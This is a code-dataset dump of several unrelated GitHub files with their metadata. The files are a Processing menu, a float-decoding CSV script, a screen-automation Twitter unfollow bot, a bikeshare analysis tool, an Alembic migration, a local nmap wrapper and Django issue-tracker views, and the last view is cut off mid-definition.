blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c575a9c2ea029a2616fb7aa34165dc2b935eb63a | 3b863f7e7efea09f5a120eb8c323e5a3742b82b3 | /LevelSelection_Page/LevelSelection_Page.pyde | 23a2c39a016791744f8abcef5874cfa5058a187b | [] | no_license | TriceG/DNA_Project | b6096fbc91c35621b659dd5154a1972a9674d881 | 469df295120fbfe32070fd973c55f36b2af99341 | refs/heads/master | 2021-01-19T21:32:24.914550 | 2017-06-20T14:15:27 | 2017-06-20T14:15:27 | 88,661,601 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,072 | pyde | def setup():
background(37, 154, 247)
size(800, 500)
def draw():
    """Processing draw loop: render the three level-selection buttons and labels."""
    fill(225)  # light grey fill for the button rectangles
    rectMode(CENTER)  # rect() coordinates are the rectangle centre
    # BEGINNER button
    rect(400, 175, 150, 50)
    # INTERMEDIATE button
    rect(400, 275, 239, 50)
    # ADVANCED button
    rect(400, 375, 190, 50)
    textSize(30)
    # page title
    text("Select a Level:", 300, 100)
    fill(0)  # switch to black for the button captions
    # button captions ("BEGINER" typo is user-visible runtime text, left as-is)
    text("BEGINER", 337, 185)
    text("INTERMEDIATE", 292, 285)
    text("ADVANCED", 316, 385)
def mouseClicked():
    """Processing click handler: hit-test each button rectangle; changing the
    background colour is a placeholder for loading the chosen mode."""
    # BEGINNER button clicked (150x50 rect centred at (400, 175))
    if mouseX > 325 and mouseX < 475 and mouseY > 150 and mouseY < 200:
        # go to easy mode
        # TODO: Import Easy Mode
        background(194, 247, 37)
    # INTERMEDIATE button clicked (239x50 rect centred at (400, 275))
    if mouseX > 280.5 and mouseX < 519.5 and mouseY > 250 and mouseY < 300:
        # go to medium mode
        # TODO: Import Medium Mode
        background(47, 247, 37)
    # ADVANCED button clicked (190x50 rect centred at (400, 375))
    if mouseX > 305 and mouseX < 495 and mouseY > 350 and mouseY < 400:
        # go to hard mode
        # TODO: Import Hard Mode
background(27, 167, 20) | [
"none@none"
] | none@none |
02a649e42a7cdd51c91d3a54eaaf62522d71e35f | ca65d98cb41b0da151158640a7be9ea0253d20ac | /floating-real_csv.py | d87635573111d1572d95586785cfa81f1a64c22d | [
"Apache-2.0"
] | permissive | ashokn414/python_floating_conversions | adebb5c2ca4839fed51a3c37c8d5176da4fbb2bb | 7a132c703272e6651daf555816171f04ee5b5555 | refs/heads/main | 2023-08-25T05:19:57.347582 | 2021-11-03T04:52:02 | 2021-11-03T04:52:02 | 422,618,772 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,245 | py | import csv
#########################################
def convertToInt(a):
    """Decode a 16-bit floating-point bit string into its real value.

    Layout: a[0] sign bit, a[1:6] 5-bit exponent (bias 15), a[6:] fraction
    bits with an implicit leading 1 (normal numbers only).
    """
    sign_bit = int(a[0])
    exponent = int(a[1:6], 2) - 15  # remove the bias of 15
    frac_bits = a[6:]

    # Fraction as an exact binary fraction: int value / 2**bit_count.
    fraction = 0.0
    if frac_bits:
        fraction = int(frac_bits, 2) / float(2 ** len(frac_bits))
    significand = 1 + fraction  # implicit leading one

    return (-1) ** sign_bit * significand * 2 ** exponent
###################################################
# Convert a CSV of 16-bit float bit strings into decoded real coordinates.
filename = "floating_values.csv"
fields = []
rows = []
# Read the header row, then collect every non-empty data row.
with open(filename,'r') as csvfile:
    reader = csv.reader(csvfile)
    fields = next(reader)
    for row in reader:
        if(row!=[]):
            rows.append(row)
# Decode both bit-string columns in place.
for row in rows:
    a = convertToInt(row[0])
    b = convertToInt(row[1])
    row[0] = a
    row[1] = b
    #print("the "+str(rows.index(row))+" co-ordinate is "+"("+str(a)+","+str(b)+")")
# NOTE(review): "cordinate" typo below is written into the output header.
fields = ["normalized x coordinate","normalized y cordinate"]
filename = "float_to_normalized_values.csv"
# Write header now; the data rows are written by the writerows() call that follows.
with open(filename,'w') as csvfile:
    writer = csv.writer(csvfile)
    writer.writerow(fields)
writer.writerows(rows) | [
"noreply@github.com"
] | noreply@github.com |
8547e7d4e69d717ba39c389d0b216825fb5e2613 | 7e1f0e8ca64e92e11247446f9f1d1433c5e9d25e | /UnFollow.py | c41254739a344ee99b82e6c2ec6623bbfa9a548c | [] | no_license | Dmen1478/CSC-450--TWITTER-BOT | 84e279a8af0f3475b222a6e9ba16352af9aaad97 | c9f617b5d6111c7d4c007def87c5109ea7bec586 | refs/heads/master | 2020-08-24T21:02:01.530237 | 2019-10-22T19:58:33 | 2019-10-22T19:58:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,279 | py | import pyautogui
import cv2
import numpy as np
from time import sleep
import pyperclip
def unfollow():
    """Drive the on-screen Twitter UI via pyautogui + OpenCV template matching.

    Steps: click the profile icon, open the followers list, copy the visible
    handles into followers.txt (a whitelist), open the "following" list, then
    repeatedly locate @-sign markers on screen and pass the matches to
    dothething() until the daily cap tracked in unfollowedcount.txt is hit.

    Side effects: writes img/screenshot.png, appends to followers.txt, moves
    the real mouse/keyboard, and reads unfollowedcount.txt.
    """
    pyautogui.PAUSE = .3
    # --- click the profile icon found by template matching ---
    pyautogui.screenshot('img/screenshot.png')
    img_rgb = cv2.imread('img/screenshot.png')
    img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
    template = cv2.imread('img/profile.png', 0)
    res = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)
    threshold = 0.8
    loc = np.where(res >= threshold)
    # only the first match is used (loop breaks immediately)
    for npt in zip(*loc[::-1]):
        pyautogui.moveTo(npt[0], npt[1] + 5)
        pyautogui.moveRel(+10, +15)
        pyautogui.click()
        break
    sleep(3)
    # --- open the followers list ---
    pyautogui.screenshot('img/screenshot.png')
    img_rgb = cv2.imread('img/screenshot.png')
    img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
    template = cv2.imread('img/profilefollowers.png', 0)
    res = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)
    threshold = 0.9
    loc = np.where(res >= threshold)
    for npt in zip(*loc[::-1]):
        pyautogui.moveTo(npt[0], npt[1] + 5)
        pyautogui.moveRel(+5, +5)
        pyautogui.click()
        break
    sleep(3)
    # --- click below the tweet button to focus the page body ---
    pyautogui.screenshot('img/screenshot.png')
    img_rgb = cv2.imread('img/screenshot.png')
    img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
    template = cv2.imread('img/tweetbutton.png', 0)
    res = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)
    threshold = 0.8
    loc = np.where(res >= threshold)
    for npt in zip(*loc[::-1]):
        pyautogui.moveTo(npt[0], npt[1] + 5)
        pyautogui.moveRel(+50, +150)
        pyautogui.click()
        break
    # select-all + copy the page text, then keep only @handles
    pyautogui.hotkey('ctrl', 'a')
    pyautogui.hotkey('ctrl', 'c')
    eew = str(pyperclip.paste())
    eew = eew.split()
    users = []
    for c in eew:
        if c.startswith('@'):
            users.append(c)
    # append the harvested follower handles to the whitelist file
    f = open('followers.txt', 'r+')
    for i in users:
        f.write(i + '\n')
    f.close()
    pyautogui.click()
    # --- open the "following" list ---
    pyautogui.screenshot('img/screenshot.png')
    img_rgb = cv2.imread('img/screenshot.png')
    img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
    template = cv2.imread('img/profilefollowing.png', 0)
    res = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)
    threshold = 0.9
    loc = np.where(res >= threshold)
    for npt in zip(*loc[::-1]):
        pyautogui.moveTo(npt[0], npt[1] + 5)
        pyautogui.moveRel(+5, +5)
        pyautogui.click()
        break
    sleep(2)
    # scroll to the bottom of the lazily-loaded list (ten End presses)
    pyautogui.PAUSE = .9
    pyautogui.hotkey('end')
    pyautogui.hotkey('end')
    pyautogui.hotkey('end')
    pyautogui.hotkey('end')
    pyautogui.hotkey('end')
    pyautogui.hotkey('end')
    pyautogui.hotkey('end')
    pyautogui.hotkey('end')
    pyautogui.hotkey('end')
    pyautogui.hotkey('end')
    pyautogui.PAUSE = .3
    # NOTE(review): this handle is never closed in this function.
    f = open('unfollowedcount.txt', 'r+')
    num = f.read()
    num = int(num)
    curunfollowed = num
    # NOTE(review): curunfollowed is never updated here; the loop relies on
    # dothething() calling quit() once the cap of 90 is reached.
    while curunfollowed <= 90:
        pyautogui.screenshot('img/screenshot.png')
        img_rgb = cv2.imread('img/screenshot.png')
        img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
        template = cv2.imread('img/atSign.png', 0)
        res = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)
        threshold = .9
        loc = np.where(res >= threshold)
        dothething(loc)
        pyautogui.scroll(1000)
def dothething(loc):
    """Unfollow each @-handle match in `loc` unless it is whitelisted.

    Args:
        loc: numpy.where() result of template matches (row/col index arrays).

    Skips handles that appear in followers.txt, contain 'Follows', or were
    already unfollowed (unfollowedusers.txt). Persists the running count in
    unfollowedcount.txt and calls quit() once 90 unfollows are reached.
    """
    # whitelist of handles we must never unfollow
    f = open('followers.txt', 'r')
    g = f.read()
    f.close()
    # running daily counter, rewritten in place after each unfollow
    f = open('unfollowedcount.txt', 'r+')
    num = f.read()
    num = int(num)
    curunfollowed = num
    for npt in zip(*loc[::-1]):
        if curunfollowed >= 90:
            print('Too many unfollowed today. Edit unfollowedcount.txt to unfollow more.')
            quit()
        # drag-select the handle text next to the @ marker and copy it
        pyautogui.moveTo(npt[0] - 4, npt[1] + 11)
        pyautogui.dragRel(300, 0, duration=.7)
        pyautogui.hotkey('ctrl', 'c')
        copy = pyperclip.paste()
        copy = copy.split()
        name = copy[len(copy)-1]
        # NOTE(review): this handle is opened once per match and never closed.
        n = open('unfollowedusers.txt')
        if name in g or 'Follows' in name or name in n.read():
            pass
        else:
            print('Unfollowing {}'.format(copy[len(copy)-1]))
            # open the follow/unfollow menu next to the handle
            pyautogui.moveRel(165, -10)
            pyautogui.click()
            pyautogui.screenshot('img/screenshot.png')
            img_rgb = cv2.imread('img/screenshot.png')
            img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
            template = cv2.imread('img/unfollowbtn.png', 0)
            res = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)
            threshold = 0.8
            # NOTE(review): rebinding loc/npt here shadows the outer loop's values
            loc = np.where(res >= threshold)
            for npt in zip(*loc[::-1]):
                pyautogui.moveTo(npt[0], npt[1] + 5)
                pyautogui.moveRel(+20, +20)
                pyautogui.click()
                break
            # persist the new count and record the unfollowed handle
            curunfollowed += 1
            f.seek(0)
            f.write(str(curunfollowed))
            f.truncate()
            s = open('unfollowedusers.txt', 'a+')
            s.seek(0)
            s.write(str(copy[len(copy)-1]) + '\n')
            s.truncate()
            s.close()
    f.close()
| [
"noreply@github.com"
] | noreply@github.com |
f880b1a41db9a22cb56ee96ae77447fe83dbfb54 | b3322943e3b37392c3029caf84b724dac5b00729 | /bikeshare_2.py | 5d667d5aebd5060130b7144d6a34cfdd2af46153 | [] | no_license | paran93/Bike-SHARE | 97af32dd7d250dd182ede3213216ec2c9dcb7248 | 1f628de7f60bfffb04be515f1ba8fd4d42ddad7e | refs/heads/main | 2022-12-20T03:00:39.002344 | 2020-10-17T02:49:34 | 2020-10-17T02:49:34 | 304,783,822 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,887 | py |
# stdlib
import collections
import time  # used by every *_stats function (time.time timing); was missing

# third-party
import numpy as np
import pandas as pd
CITY_DATA = {'chicago': 'chicago.csv',
'new york city': 'new_york_city.csv',
'washington': 'washington.csv'}
cities = [*CITY_DATA]
options = ["a", "b", "c"]
diction = dict(zip(options, cities))
months = ['january', 'february', 'march', 'april', 'may', 'june', 'all']
days = ['sunday', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'all']
def get_filters():
    """
    Ask the user to choose a city, a month and a day to analyze.

    Returns:
        (str) city - name of the city to analyze
        (str) month - name of the month to filter by, or "all" to apply no month filter
        (str) day - name of the day of week to filter by, or "all" to apply no day filter
    """
    print('\nHello! Let\'s explore some US bikeshare data!\n')

    def _ask(first_prompt, retry_prompt, valid_answers):
        # Re-prompt until the normalized answer is one of the valid choices.
        answer = input(first_prompt).lower().strip()
        while answer not in valid_answers:
            answer = input(retry_prompt).lower().strip()
        return answer

    option = _ask(
        "Can you choose a city by typing the letter corresponding:\n"
        " a) chicago , b) new york city , c) washington\n ",
        'Invalid input, please choose a city by typing the letter corresponding:\n'
        ' a) chicago , b) new york city , c) washington\n ',
        options)
    city = diction[option]  # map the chosen letter to the city name

    month = _ask(
        "And also choose a month please: [january , february , march , april , may , june , all]?\n ",
        'Invalid input please choose from the options provided: [january , february , march , april , may , '
        'june , all]?\n ',
        months)

    day = _ask(
        "Lastly, which day do you want to study: [sunday , monday "
        ", tuesday , wednesday , thursday , friday , saturday, "
        "all]?\n ",
        "Invalid input please choose from the options provided: [sunday , monday , tuesday , wednesday , "
        "thursday , friday , saturday, all]?\n ",
        days)

    print('-' * 40)
    return city, month, day
def load_data(city, month, day):
    """
    Load one city's ride data, optionally narrowed to a month and weekday.

    Args:
        (str) city - name of the city to analyze (a key of CITY_DATA)
        (str) month - month name to keep, or "all" to apply no month filter
        (str) day - weekday name to keep, or "all" to apply no day filter
    Returns:
        df - pandas DataFrame containing city data filtered by month and day
    """
    frame = pd.read_csv(CITY_DATA[city])

    # Derive the filter columns from the parsed start timestamp.
    frame['Start Time'] = pd.to_datetime(frame['Start Time'])
    frame['month'] = frame['Start Time'].dt.month
    frame['day_of_week'] = frame['Start Time'].dt.day_name()

    if month != 'all':
        # Month names map to 1-based month numbers (january == 1).
        month_number = 1 + ['january', 'february', 'march', 'april', 'may', 'june'].index(month)
        frame = frame[frame['month'] == month_number]

    if day != 'all':
        frame = frame[frame['day_of_week'] == day.title()]

    return frame
def time_stats(df, month, day):
    """Display statistics on the most frequent times of travel.

    Args:
        df: DataFrame with 'month', 'day_of_week' and 'Start Time' columns
            (as produced by load_data).
        month: the month filter already applied; month stats print only when 'all'.
        day: the day filter already applied; day stats print only when 'all'.
    """
    print('\nCalculating The Most Frequent Times of Travel...\n')
    start_time = time.time()

    if month == 'all':
        # most common month and its occurrence count (vectorized instead of a loop)
        mode_month = df['month'].mode()[0]
        n_month = int((df['month'] == mode_month).sum())
        print('The most-common-month prize goes to: {}\nand its nu'
              'mber of occurrences is {}\n '.format(mode_month, n_month))

    if day == 'all':
        # most common day of week; fix: this message previously said
        # "most-common-month" (copy-paste error)
        mode_day = df['day_of_week'].mode()[0]
        n_day = int((df['day_of_week'] == mode_day).sum())
        print('And the most-common-day prize goes to: {}\nand its nu'
              'mber of occurrences is {}\n '.format(mode_day, n_day))

    # most common start hour and its occurrence count
    hours = df['Start Time'].dt.hour
    mode_time = hours.mode()[0]
    n_hour = int((hours == mode_time).sum())
    print('Last but not least, the most-common-start-hour prize goes to: {}\nand its nu'
          'mber of occurrences is {}\n '.format(mode_time, n_hour))

    print("\nThis took %s seconds." % (time.time() - start_time))
    print('-' * 40)
def station_stats(df):
    """Displays statistics on the most popular stations and trip.

    Expects 'Start Station' and 'End Station' columns; prints the most common
    start station, end station, and (start, end) pair with their counts.
    """
    print('\nCalculating The Most Popular Stations and Trip...\n')
    start_time = time.time()
    # most common start station and how many rows share it
    start_stations = df['Start Station']
    mode_start_station = start_stations.mode()[0]
    n_s_mode = len(df[start_stations == mode_start_station])
    print('The most-common-start-station prize goes to: {}\nand its nu'
          'mber of occurrences is {}\n '.format(mode_start_station, n_s_mode))
    # most common end station
    end_stations = df['End Station']
    mode_end_station = end_stations.mode()[0]
    n_e_mode = len(df[end_stations == mode_end_station])
    print('And the most-common-end-station prize goes to: {}\nand its nu'
          'mber of occurrences is {}\n '.format(mode_end_station, n_e_mode))
    # most common (start, end) trip via a Counter over the zipped pairs
    combinations = list(zip(start_stations, end_stations))
    n_combinations = 0
    mode_trip = collections.Counter(combinations).most_common(1)[0][0]
    for combination in combinations:
        if combination == mode_trip:
            n_combinations += 1
    print('Last but not least, the most-common-trip prize goes to: {}\nand its nu'
          'mber of occurrences is {}\n '.format(mode_trip, n_combinations))
    print("\nThis took %s seconds." % (time.time() - start_time))
    print('-' * 40)
def trip_duration_stats(df):
    """Print the total trip time (hours) and mean trip time (minutes)."""
    print('\nCalculating Trip Duration...\n')
    t0 = time.time()

    # 'Trip Duration' is in seconds; convert the aggregate figures once.
    durations = df['Trip Duration']
    total_hours = durations.sum() / 3600
    mean_minutes = durations.mean() / 60

    print('The Total Trip time for the timeframe and city chosen is: {} hours\n'.format(round(total_hours, 2)))
    print('For an average of: {} minutes\n'.format(round(mean_minutes, 2)))

    print("\nThis took %s seconds." % (time.time() - t0))
    print('-' * 40)
def user_stats(df, city):
    """Displays statistics on bikeshare users.

    Prints user-type counts for every city; gender and birth-year stats are
    skipped for Washington, whose CSV lacks those columns.
    """
    print('\nCalculating User Stats...\n')
    start_time = time.time()
    # Display counts of user types
    types = list(set(df['User Type']))
    print('Now for the types of existing customers in the criteria chosen, there is {} for a total of'
          ' {} types. \n'.format(types, len(types)))
    df_types = df['User Type']
    for df_type in types:
        print("{}s: {}\n".format(df_type, len(df[df_types == df_type])))
    # Display counts of gender (absent from the Washington data)
    if city != "washington":
        gender = list(set(df['Gender'].fillna("Gender not provided")))
        df_genders = df['Gender']
        print('And the Genders of existing customers for the criteria chosen are {} for a total of'
              ' {} genders. \n'.format(gender, len(gender)))
        for df_gender in gender:
            print(
                "{}s: {} customer\n".format(df_gender, len(df[df_genders.fillna("Gender not provided") == df_gender])))
        print('Also the majority of the our customers in this'
              ' criteria are {}s.\n'.format(df["Gender"].mode()[0]))
        # Display earliest, most recent, and most common year of birth
        # (inside the guard because Washington also lacks 'Birth Year')
        df_sorted = df.sort_values(by='Start Time', ascending=False)
        print('And now the first customer we dealt with in the criteria chosen was born in {}.\n'.format(
            int(df_sorted["Birth Year"].iloc[-1])))
        print('The most recent customer was born in {}.\n'.format(int(df_sorted["Birth Year"].iloc[0])))
        print('The most common birth year is {}.\n'.format(int(df["Birth Year"].mode()[0])))
    print("\nThis took %s seconds." % (time.time() - start_time))
    print('-' * 40)
def main():
    """Interactive loop: prompt for filters, show all stats, optionally page
    through raw rows, and repeat until the user declines a restart."""
    while True:
        city, month, day = get_filters()
        df = load_data(city, month, day)
        time_stats(df, month, day)
        station_stats(df)
        trip_duration_stats(df)
        user_stats(df, city)
        i=5  # number of head/tail rows shown; grows by 5 each time
        while True:
            print_data = input('\nWould you like to print some data? Enter yes or no\n')
            if print_data.lower().strip() != 'yes':
                break
            else:
                print(df.head(i))
                print(df.tail(i))
                i += 5
        restart = input('\nWould you like to restart? Enter yes or no.\n')
        if restart.lower().strip() != 'yes':
            break


if __name__ == "__main__":
    main()
| [
"noreply@github.com"
] | noreply@github.com |
a20ec94cdd08e187e7c7cf1132457f3b19af8131 | cecd42a1c39ff00b7eb56ef244ef3ae3f884522c | /migrations/versions/388b36ae960d_.py | 36a0af9537bd943fb6643893aa024b5a3c83a9cc | [] | no_license | ylin1992/fyyur | 9b6129a725a1af1d01154424cc60d945eb11a48b | e926a263114b007870619f37dc9261f01878a530 | refs/heads/main | 2023-09-02T15:07:08.645111 | 2021-10-30T09:49:12 | 2021-10-30T09:49:12 | 422,549,983 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 663 | py | """empty message
Revision ID: 388b36ae960d
Revises: 4585432e4a99
Create Date: 2021-10-28 20:46:38.170649
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '388b36ae960d'
down_revision = '4585432e4a99'
branch_labels = None
depends_on = None
def upgrade():
    """Apply the migration: add a nullable `website` varchar(120) column to Artist."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.add_column('Artist', sa.Column('website', sa.String(length=120), nullable=True))
    # ### end Alembic commands ###
def downgrade():
    """Revert the migration: drop the `website` column from Artist."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('Artist', 'website')
    # ### end Alembic commands ###
| [
"linyeah2011@gmail.com"
] | linyeah2011@gmail.com |
7ed5d2c3249c5f83bae48f12740eff65e85957ff | 98b453391da7cc5d2990ccc399991329aed5dda3 | /Joe_Cox_PyNmap.py | 04f14525b7373b5b0149a5232362caba14f6f448 | [] | no_license | jonoco52/CSIA-450-Public | c26b7901dc9c978668451df0eb0f10bd91e2529c | d39a12f3b4a8bdfe22789bf0c57a4318abe2a8cc | refs/heads/master | 2022-07-05T15:36:59.273128 | 2020-05-13T16:35:46 | 2020-05-13T16:35:46 | 261,049,819 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,839 | py | # -*- coding: utf-8 -*-
"""
Created on Tue May 5 08:29:37 2020
@author: Joseph
"""
__author__ = "Joe Cox"
__email__ = "jocox@students.columbiabasin.edu"
__date_ = "Spring 2020"
__version__ = "0.0.1"
# LIBRARIES
from datetime import date
import os
import pickle
import json
import subprocess
from difflib import SequenceMatcher
# SET VARIABLES
my_dir = '/Users/Joseph/Downloads/830199374'
my_pickle = my_dir + '/data.pickle'
my_json = my_dir + '/data.json'
port_list = ['192.168.1.1:80', '192.168.1.1:23', '192.168.1.1:22']
nmap_path = '/Users/Joseph/Desktop/nmap-7.70/nmap.exe'
nmap_network = '192.168.1.1'
def create_directory():
    """Create the working directory `my_dir` if it does not already exist.

    Prints an INFO/ERROR status line; OSError is reported, never propagated.
    """
    # guard clause instead of the `== False` comparison anti-idiom
    if os.path.isdir(my_dir):
        print("INFO: The directory already exists:", my_dir)
        return
    try:
        os.mkdir(my_dir)
        print("INFO: The directory was created:", my_dir)
    except OSError:
        # e.g. missing parent directory or insufficient permissions
        print("ERROR: Failed to create directory:", my_dir)
def create_date_string():
    """Return today's date formatted as MMDDYY (used to name daily snapshots)."""
    return date.today().strftime("%m%d%y")
def write_files(input_data, file_name):
    """Serialize `input_data` under `my_dir` as <file_name>.pickle and <file_name>.json.

    Args:
        input_data: an object serializable by both pickle and json.
            NOTE(review): run_nmap() returns a list of *bytes* lines, which
            json.dump cannot serialize — decode upstream; TODO confirm intent.
        file_name: base file name without extension.
    """
    base = os.path.join(my_dir, str(file_name))
    # write the pickle file (`with` closes the handle; the old explicit
    # fp.close() inside the block was redundant)
    with open(base + '.pickle', 'wb') as fp:
        pickle.dump(input_data, fp)
    # write the json file
    with open(base + '.json', 'w') as fp:
        json.dump(input_data, fp)
def read_files(seq, file_name):
    """Load and print the pickle and json snapshots named <file_name> from `my_dir`.

    Args:
        seq: unused — NOTE(review): kept only for call compatibility; TODO remove.
        file_name: base file name without extension.
    """
    port_list = []
    # read the pickle file (only unpickle files this tool wrote itself —
    # pickle.load on untrusted data executes arbitrary code)
    with open (str(my_dir) + '/' + str(file_name) + '.pickle' , 'rb') as fp:
        port_list = pickle.load(fp)
        fp.close()  # redundant: the `with` block already closes fp
    print("pickle:", port_list)
    port_list = []
    # read the json file
    with open(str(my_dir) + '/' + str(file_name) + '.json' ,'r') as fp:
        port_list = json.load(fp)
        fp.close()  # redundant: the `with` block already closes fp
    print("json:", port_list)
def run_nmap():
    """Run `nmap -T4` against `nmap_network` and return stdout split into lines.

    Returns a list of *bytes* lines (subprocess.run is called without text=True).
    """
    nmap_out = subprocess.run([nmap_path, "-T4", nmap_network], capture_output=True)
    nmap_data = nmap_out.stdout.splitlines()
    #nmap_data = 'nmap output'
    return nmap_data
# --- script entry: scan, snapshot today's results, then diff two fixed snapshots ---
create_directory()
input_data = run_nmap()
print(input_data)
file_name = create_date_string()
write_files(input_data, file_name)

import filecmp
path = my_dir
# NOTE(review): `path` has no trailing separator, so these resolve to e.g.
# ".../830199374051220.json"; filecmp.dircmp also expects two *directories*,
# not files — this comparison likely never worked as intended. TODO confirm.
comparison = filecmp.dircmp(path+ '051220.json' ,path+ '051220.pickle')
common_files = ','.join(comparison.common)
left_only_file = ','.join(comparison.left_only)
right_only_file = ','.join(comparison.right_only)
with open(path+'folder_diff.txt' , 'w') as folder_report:
    folder_report.write("common files: "+common_files+ '\n')
    folder_report.write('\n'+"only in json file"+left_only_file+'\n')
    folder_report.write('\n'+"only in pickle file"+right_only_file+'\n')
| [
"noreply@github.com"
] | noreply@github.com |
17c45d94efa8018ba6165c376fcf4a8981629f48 | c5bc44b4bb7aa0b8e6df81c198e9803eb0f060ce | /pro_tracker/issue/views.py | 7a365ad081af225db4a559345972d6c6de5b7ae1 | [] | no_license | hyperloop11/Progress-tracking-website | 4821b1c17b04b223b1a20610b1612b11b0a54ce3 | 7c3bd77a0b0605994b001544fc809c1e52a18f82 | refs/heads/master | 2023-06-21T12:06:26.531345 | 2021-08-05T07:21:37 | 2021-08-05T07:21:37 | 298,636,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,218 | py | from django.shortcuts import render, get_object_or_404
from django.views.generic import (
ListView, DetailView,
CreateView, UpdateView,
)
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from .models import Issue
from django.contrib.auth.models import User, Permission
from .forms import IssueUpdateForm, CommentForm
from django.views.generic.edit import FormMixin
from django.urls import reverse
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from notifications.signals import notify
def home(request):
    """Render the issue home page with every issue (unpaginated legacy view)."""
    context = {
        'posts': Issue.objects.all()
    }
    return render(request, 'issue/home.html', context)
class IssueListView(ListView):
    """Paginated list of open (not completed) issues, newest first."""
    model = Issue
    template_name='issue/home.html'
    context_object_name='posts'
    paginate_by=6
    #ORDERING
    def get_queryset(self):
        # only open issues, highest id (most recent) first
        return Issue.objects.filter(completed=False).order_by('-id')
class OldIssueListView(ListView):
    """Paginated archive of completed issues, newest first (same template)."""
    model = Issue
    template_name='issue/home.html'
    context_object_name='posts'
    paginate_by=6
    #ORDERING
    def get_queryset(self):
        # only completed issues, highest id (most recent) first
        return Issue.objects.filter(completed=True).order_by('-id')
class IssueDetailView(FormMixin, DetailView):
    """Issue detail page with an embedded comment form.

    GET renders the issue plus a prefilled CommentForm; POST validates the
    comment, notifies every other author of the issue, and saves it.
    """
    model = Issue
    form_class=CommentForm
    def get_success_url(self):
        # redirect back to this issue after a successful comment
        return reverse('issue-detail', kwargs={'pk': self.object.id})
    def get_context_data(self, **kwargs):
        context = super(IssueDetailView, self).get_context_data(**kwargs)
        # prefill the hidden issue/author fields of the comment form
        context['form'] = CommentForm(initial={'issue': self.object.id, 'author': self.request.user})
        return context
    def post(self, request, *args, **kwargs):
        self.object = self.get_object()
        form = self.get_form()
        if form.is_valid():
            # notify every author of the issue except the commenter themselves
            curr_issue = Issue.objects.get(pk=self.object.id)
            for user in curr_issue.author.all() :
                if self.request.user != user:
                    notify.send(
                        request.user,
                        recipient=user,
                        verb = 'commented on your issue',
                        target=curr_issue,
                    )
            return self.form_valid(form)
        else:
            return self.form_invalid(form)
    def form_valid(self, form):
        # persist the comment, then let FormMixin redirect to get_success_url()
        form.save()
        return super(IssueDetailView, self).form_valid(form)
class IssueCreateView(LoginRequiredMixin, CreateView):
    """Create a new issue; the logged-in user is recorded as an author."""
    model = Issue
    fields= ['title', 'content', 'priority']
    def form_valid(self, form):
        # save first so the instance has a pk, then attach the creator (M2M author)
        form.save()
        form.instance.author.add(self.request.user)
        return super().form_valid(form)
    def view_type(self):
        # presumably consumed by the shared form template to label the page — TODO confirm
        return "Create"
class IssueUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
    """Edit an issue; only its authors or users with `issue.change_issue` may update.

    NOTE: an abandoned experiment that filtered the author queryset per request
    was removed from the class body (see VCS history).
    """
    model = Issue
    form_class = IssueUpdateForm
    def form_valid(self, form):
        # save, then ensure the editor is recorded as an author (M2M add is idempotent)
        form.save()
        form.instance.author.add(self.request.user)
        return super().form_valid(form)
    def test_func(self):
        # UserPassesTestMixin hook: allow authors and privileged users only
        post= self.get_object()
        if self.request.user in post.author.all() or self.request.user.has_perm('issue.change_issue'):
            return True
        else:
            return False
    def view_type(self):
        # presumably consumed by the shared form template to label the page — TODO confirm
        return "Update"
#to fix kwargs in issue list view, better not inherit from listView and make a function.
def UserIssue(request,username):
    """List one user's open issues, paginated, newest first (404 on unknown user)."""
    this_user = get_object_or_404(User, username=username)
    posts = this_user.issue_set.filter(completed=False).order_by('-id')
    paginator = Paginator(posts, 2) # 2 issues per page
    page_number = request.GET.get('page', 1)
    try:
        page_obj = paginator.page(page_number)
    except PageNotAnInteger:
        # non-numeric ?page= falls back to the first page
        page_obj = paginator.page(1)
    except EmptyPage:
        # out-of-range pages clamp to the last page
        page_obj = paginator.page(paginator.num_pages)
    context = {
        'this_user': this_user,
        'posts': page_obj,
    }
    return render(request, 'issue/user_issues.html', context)
def UserIssueArchives(request,username):
    """List one user's completed issues, paginated, newest first (404 on unknown user)."""
